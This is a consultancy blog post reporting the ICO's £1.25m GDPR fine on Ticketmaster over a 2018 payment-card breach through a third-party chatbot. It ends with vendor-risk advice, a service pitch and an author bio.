Ticketmaster Hit With £1.25m GDPR Fine Over Data Breach

The ICO has fined Ticketmaster £1.25 million over a data breach that happened in 2018. The cyberattack affected the payment information of more than nine million customers.

How the breach happened

A vulnerability in a third party chatbot allowed hackers to gain access to Ticketmaster’s payment page. As a result, the payment details (card numbers, expiry dates and CVV numbers) of customers were exposed.

James Dipple-Johnstone, Deputy Commissioner at the ICO said:

Ticketmaster should have done more to reduce the risk of a cyber-attack. Its failure to do so meant that millions of people in the UK and Europe were exposed to potential fraud.

According to the ICO, Ticketmaster failed to do the following:

1. Assess the risks of using a third party chatbot on its payment page.
2. Identify and implement the appropriate security measures to counter the risks.
3. Identify the source of fraudulent activity in time.

Despite warnings from several financial institutions including Monzo, Barclays and AmEx, it took nine weeks for Ticketmaster to start monitoring activity on its payment page for suspicious activity. Following the breach, 60,000 Barclays customers were victims of fraud and Monzo had to replace 6,000 payment cards over suspected fraudulent use. 

With cyberattacks on the rise, third party vendors are an easy way for hackers to gain access to your organisation’s data. Research shows that over 59% of data breaches are caused by third-party vendors. Vendors that provide email server, cloud or payment services are particularly vulnerable to attacks. 

As a business, it’s your responsibility to take steps to minimise those risk. You must vet third party vendors and check their cyber-security risk at the start of your relationship. If you didn’t do this at the onset, it’s not too late. We recommend continuously monitoring the cyber-security risks of your third-party vendors to make sure you’re not caught by surprise.  To conduct a comprehensive audit, get in touch with us for our bespoke and award-winning data protection consultancy service. 

If you have been affected by a data breach, read our article on the 7 things you must do straight away to protect your personal information.

The ICO issued a warning to other organisations in their statement,

The £1.25m fine we’ve issued today will send a message to other organisations that looking after their customers’ personal details safely should be at the top of their agenda.

Kazient Privacy Experts offer bespoke Data Protection, Privacy and GDPR compliance solutions in a language you understand to UK and international organisations, and has received positive media coverage across Europe. Kazient’s GDPR consultants are fully certified to be your outsourced Data Protection Officer or EU Representative. Get in touch to find out how we can help your business by visiting our website www.kazient.co.uk or calling us on 0330 022 9009.

Mahmoudat Sanni-Oba

Mahmoudat Sanni-Oba is a Data Privacy Analyst for Kazient Privacy Experts. She earned a Bachelor's degree in Accounting and Finance from LSE in 2018 and has a keen interest in technology and data protection.